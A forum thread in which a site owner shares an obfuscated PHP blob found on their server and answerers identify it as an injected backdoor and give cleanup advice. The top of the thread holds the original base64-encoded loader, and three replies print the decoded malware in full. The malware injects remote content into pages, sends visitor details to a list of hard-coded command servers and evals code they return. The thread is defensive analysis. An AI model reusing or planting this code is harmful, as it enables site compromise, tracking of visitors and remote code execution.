OYVJVNXVZVlpzV0dWSVRtbE5NbEp0V2tab1MyTXhaM2xYYmxwcVVqRmFNVk5YYkhKalJXeEVWMWN4U2xFeFNYZFpNalZ5WTBWc1NXTXlkR3RXTTJkM1UxVlJkMW95VWtsVGJrSnBWVEpvUWxkdE1YTmpNWEJYVDFjMVlWZEdTbTFYVkVrMVpGZFNTRlp1Vm10VFJURjJVMnRvVjJWWFNrZFBTR1JLVVhwU2JsTnJhRmRsVjBwSFQwaG9URlV5Y3pOVGEyaFRaVmRXVkZGVWJFcFNNWEJ2V1d0b1QySkZPSHBOV0VKaFlWZGtjbHBGYUV0T1ZYUlpZekowWVdKclJtNVZSazVEWWxkTmVVOVhjR2hOYW13elYyeGpNR0l3Y0VsUmJXaE5VVEJGTUZSVlRqTmFNSEJJVm01c2FtSlVWakpVUlU1Q1lURndXVk51YkdwTk1VbzFWRVZPUW1Wck1VUmhlbVJvVmpGc2JsTXdUbE5pVjA1RVlUSmtiR1ZXU2pKYVJtaFNXakZDVkZGWGJGTk5SbHBXVTFWT1UwMVhUblJsUjFwT1ZUQktTbFpyV2xOVlZYZzJVbGhXVGxKdWFEVlhSV013WVZVNU5WVnVXbXRYUmtadVZFZHZkMW93YkhKaFNGcHFUVEZGTWxOVlRsTmtNV3hYWlVoc1dWSjZVbkJVTTJ4VFpHMVNXVlZYWkUxaGFrSnVVMWQwVDJSdFNuUk9WM2hhVFRGS2QxbHFTVEJPYTJ4R1ZHNU9hVTB3TlhOWFJXaExXVEpLYzJWSWJGbFNlbEp3VkhwS1lVMHlUblJpUkVKaFZUSmtjbGR0TlVKak1HeEVWVzVhYTFkR1JuZFVNMnhUWlZad1dWVlhaRkZWTUVad1UxZHdNRTB5UmtoaVNFNWhWVEJHZGxOV1pHRmlSMGw1VjFjNVMxSXhjRE5UTVU1eVdqSldOVlZ1YkdGWFJrWnVVMVZOTUU5VmJFUlJiVEZoVFd4WmQxa3piRzVoTVhCMVVWaE9TbEpGVmpWVU1FNXlUakphV0ZkdGNHbFNlbXcyVjJ4T2JtRXhjSFZSV0VKUVpWWkplRmxyYUZKYU1VSlVVV3BDYW1KWGVEQlRNR2hQVFZac2RWUnFRbXBoVjJSeVdUSXhWMDFGZUVSUmJuQnJVMFZ3TTFscVRrNWlNSEJKVTIxNGExRXpaRzVUVjNnMFpWWm9TRTVYVG1waVNHZ3hVMWRzY2xvd2REVlJWRUpNVlRKek0xcHNaM2RhTUd4SVlrY3hTbEV5YURaYVJXaExaREpKZWxSWE9VdFRSbHA2V2tWT00yRldjRmxYYldocFVUQnNkMU5WVGtaUFZrSlVVVzB4V2xZemFEWlhiRTV6VGpCd1NXSXlaRkZWTUVvMldrVm9TMk5IVGtsVWJrNWFWMFUxZGxkc2FFNWlNazE2Vlc1c1dVMHdjSE5aTUdRMFlVWnJlVlpYT1VwaVZsbDVWMVprTTJGVmVFUlRWMnhOVVRGSmVGbHJhRkpqUlhSVll6SmtZVmRHY0c5WmEwNXVZVEpXY0dGNlpFcFNNVmt3V1Zab1VtSXdkRlZrUkd4b1ZqRnNibE13YUU5TlIwNTFVVzVhYW1WWFpISmFSbVEwVFVWNFJGTnRlRnBpVkZadlUxZHNjbG93YkZWTlJHeEtVakZ3YjFscmFFOWlSWFJaWXpKMFdVMVZOVWRXVjNoaFVteFdjMk15YkdGTmFtd3lWMnRPUzFwRmJFVk5SMlJxVFRGS05WZEVUa3RpUjA1SVpVZG9XazFzVm5aVFZ6RlhZVmRLZEZKWGJFMVJNR3h3VkVWT1UwMVhTa2xWV0VKUVRUQndjMXBGYUZkbFYwcHdVV3BDYW1Kc1duTlVlazE0WWtkS1NWUnRlRXBUU0ZJMVYyeG9VMDFYVG5ST1IyUmhZbFZhZWxsNlNsWk9NbHBaVFVkMFlXSlZXWGRaVldSWFpWVXhjMlJIVWtwU1JFSnVVMWR3YWswd2VIRmFNMmhOWVd0cmQxUldUVEJsVlRWVlZGZHNVR1ZXU25SWFZtaFRZakZ3V1ZOWWJGaE5WRUp1VlVaT1FtRlZOVVZYV0ZaT1lXeEZNVlJIY0ZaT1JYaHhVbGh3VDFVd2F6TlRhMlJoWVVkU1NHRkhlR3BoYTNCcFYwWk9RazlWYkVSVFdHaFBaV3hzTVZReFRUQmxWVFZGVWxoV1RsWkdWak5UVjNCNllURndkRkpxUW1oU01WbzFWRmQ0TUZwRmJFVk5SMlJLWVd4RmVWUkhjRTVOTUhoeFVsUktVRlY2VVhoVWJXeEtUakJ3U0ZkdGFHdFNNbWh6V1RKd1MxbHNhRlJSVkd4S1VUQnJNVlJyVFRCbFZUVkZVMWhXVG1Gc1ZYaFVSM0JPVFZWc2NXTXlkR0ZpVlZsM1dWVmtWMlZWTVhOa1IxSktVa1JDYmxOWGNFWk5NRGxFVGtob1QyRnJiREZVVmxKS1RsVjRjVk5ZYkU1bFZXc3pVMnRrWVdGSFVraGhSM2hxWVd0d2FWZEdUa0pQVld4RVUxaHdUbFY2VWpSVU1GSlNaRlV4Y1ZSVVFrMWhiWE41VTFkd2VtRXhjSFJTYWtKb1VqRmFOVlJYZURCYVJXeEZUVWRrU21GdFRYcFVSM0J5VFZWNGNWSlVVazFoYTFVd1ZERk9TazR3Y0VoWGJXaHJVakpvYzFreWNFdFpiR2hVVVZSc1NsRXdhekZVV0dzd1pVVTFObEZZVms1V1JUQjZWRWR3U21WVmJIRmpNblJoWWxWWmQxbFZaRmRsVlRGelpFZFNTbEpFUW01VFYzQkdUa1U1UkU1RVFrNVJlbEV4Vkd4Tk1HVlZOVVZWVjJ4UVpWWktkRmRXYUZOaU1YQlpVMWhzV0UxVVFtNVZSazVDWVZVeFZXRjZWazFoYTFZMFZHeE5NR1ZWTVRaU1dGWlBWa2RrY0ZRemJGTmlWbXhaVlcwNVlWZEZiRFZXZWtWM1dqRkNWRkZYYkZCU1JXd3hWRlpTY21WVmVIRmFlazVOWVd0VmVsUXdUa3BPTUhCSVYyMW9hMUl5YUhOWk1uQkxXV3hvVkZGVWJFcFJNR3cxVkZaU1dtUlZNWEZWVkVwTllXMXpNVlJIY0VwbFJUVlVVMVJrUzFJeGNHOWFSV1J2WWtkT2NWTnRTbGxWTUVVMVUxVk9TazVWTlZST1NHeE9Wa1ZXTVZSV1VtNWtWVFUyWVRKc1VFMHdOWFphUm1SaFlsZEtTRlpYT1V0U01YQnZXa1ZrYjJKSFRuRlRXRUpRVFd4d01sa3lNVmRoUm10NVdqSTVTMUl4Y0c5YVJXUnZZa2RPY1ZOWFpGcFhSVEZ1VTJ0b1YyVlZkRmxrU0VKaFlWVkdkbE5WWkVkaU1YQjFWbTEwWVdKWWFIUmFWekZUWWpGd2RHRkljRXhSTVVsNFdUSnNjbG93ZEZSUmFtUktVakJ3TlZkc1pFZGphMnhGWkVSc2JWZEVRVGxKYVd0d1QzbEJQU0lwS1RzZyIpKTsg";if (!function_exists("Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ")){ function Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($fmG17jH6h8R6pfvV6ODRd6K,$iot3u6fS){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 = '';foreach($fmG17jH6h8R6pfvV6ODRd6K as $seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 .= chr($seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh - $iot3u6fS);}return $AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7;}$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6 = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb,8658);$UsopvTU00NLoC = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P,8470);$D4fUhPPUiQCBxt = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($J0BQOOWj4oRnP7liN,7352);$UCUMQ98AUYryzF0tSVyD = $UsopvTU00NLoC('$kiNmYfN',$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6.'('.$D4fUhPPUiQCBxt.'($kiNmYfN));');$UCUMQ98AUYryzF0tSVyD($UbjPmIKWlC);} /*ad0b18735e68b25aa9c4374221824db5_off*/ ?>
I have no idea what it is and it's impossible to decipher. Nothing is output when you access the file directly online. Any ideas? Does it seem malicious?
If you and none of your developers have any idea where it came from then I guess you are under an attack :(. The immediate fix is to do the following,
Clean all your files.
Switch to secure FTP access immediately
Do some more research on internet about this attack and see what other actions you need to take.
You need to do it quickly since browsers like chrome and FF will notice it soon and would start showing your site as malicious to users.
You most certainly got hacked.
I did the fun to poke into the code.
The code is base64_encoded multiple times and then eval'd. Result is:
if (!function_exists("GetMama")){
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;}
str_ireplace("</body>","</body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
return $buf;}
return $buf;}
function opanki($buf){
$gz_e = false;$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}
if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);
unlink($tmpfname);
$contents = gzencode($contents);}
else {
$contents = mod_con($buf);}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);}
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;}
ob_start("opanki");
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];} else {
$host = "";}
if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];} else {
$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);}
else {
$ref = "";}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));}
else {
$ua = "";}
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);}
else {$qs = "";}
$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;}
if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;}
if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);}
fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}}
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
eval($z);
exit();}
if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);
return true;}
else {
return false;}}
$father2[] = "77.81.241.253";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "31.184.234.96";$father2[] = "77.95.18.189";$father2[] = "93.170.137.22";$father2[] = "188.40.95.244";$father2[] = "199.115.231.58";$father2[] = "82.192.87.178";$father2[] = "216.246.99.215";$father2[] = "95.211.18.79";shuffle($father2);foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}}}
Yes it is malicious code, its a bunch of base64 encoded stings evaled, and the resulting code is:
<?php
if (!function_exists("GetMama")){
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;
}
str_ireplace("</body>","</body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
return $buf;}return $buf;}function opanki($buf){
$gz_e = false;
$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);
$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);unlink($tmpfname);
$contents = gzencode($contents);
} else {$contents = mod_con($buf);}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);}
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;}ob_start("opanki");
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {
$host = "";
}if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
} else {$ip = "";
}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
} else {$ref = "";}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {
$ua = "";
}if (
isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
} else {$qs = "";}
$url_0 = "http://" . $pa;
$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
} if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;
}if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
}fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
eval($z);
exit();
}if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);return true;
}else {return false;}}
$father2[] = "77.81.241.253";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "31.184.234.96";
$father2[] = "77.95.18.189";
$father2[] = "93.170.137.22";
$father2[] = "188.40.95.244";
$father2[] = "199.115.231.58";
$father2[] = "82.192.87.178";
$father2[] = "216.246.99.215";
$father2[] = "95.211.18.79";
shuffle($father2);
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}
}
}
?>
To expand on my comment...
Are you using a CMS (Wordpress, Joomla, etc.)? If so, some 3rd party plugin and theme developers attempt to encrypt their code so that it isn't pirated...
If you wrote the site from scratch, look down.
Are you the only developer?
(YES) --> You've been hacked. --> Check your log files. -> Look for unusual activity/hack attempts. --> Attempt to find the vulnerability and patch it. --> Remove the malicious code.
(NO) --> Ask the other developer(s) if they put it there. If the answer is no, go to the above solution.
As Khan said, time is of the essence to a certain extent, because services like Google and Web of Trust will begin to mark your site as malicious. At the same time, don't just delete the foreign code. If you manage to unravel it at a later date, you may be able to figure out what it does and who it reports to --> who the hackers are.
Also look at the server logs... If your server has been rooted, then the only way to keep the hacker out would be to reinstall it.
The code is:
if (!function_exists("GetMama"))
{
function mod_con($buf){
str_ireplace("","",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("","" . stripslashes($_SERVER["good"]),$buf);
return $buf;
}
str_ireplace("","",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("",stripslashes($_SERVER["good"])."",$buf);
return $buf;
}
return $buf;
}
function opanki($buf){
$gz_e = false;$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}
if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);
$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);
unlink($tmpfname);
$contents = gzencode($contents);
}
else {
$contents = mod_con($buf);
}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);
}
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;
}
ob_start("opanki");
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(FILE);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {
$host = "";
}
if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
}
else {
$ip = "";
}
if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
}
else {
$ref = "";
}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
}
else {
$ua = "";
}
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
}
else {
$qs = "";
}
$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
}
if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;
}
if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult)); e
val($z);
exit();
}
if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);
return true;
}
else {
return false;
}
}
$father2[] = "77.81.241.253";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "31.184.234.96";
$father2[] = "77.95.18.189";
$father2[] = "93.170.137.22";
$father2[] = "188.40.95.244";
$father2[] = "199.115.231.58";
$father2[] = "82.192.87.178";
$father2[] = "216.246.99.215";
$father2[] = "95.211.18.79";
shuffle($father2);
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) {
break ;
}
}
}
Unpacked by hand so its more readable :)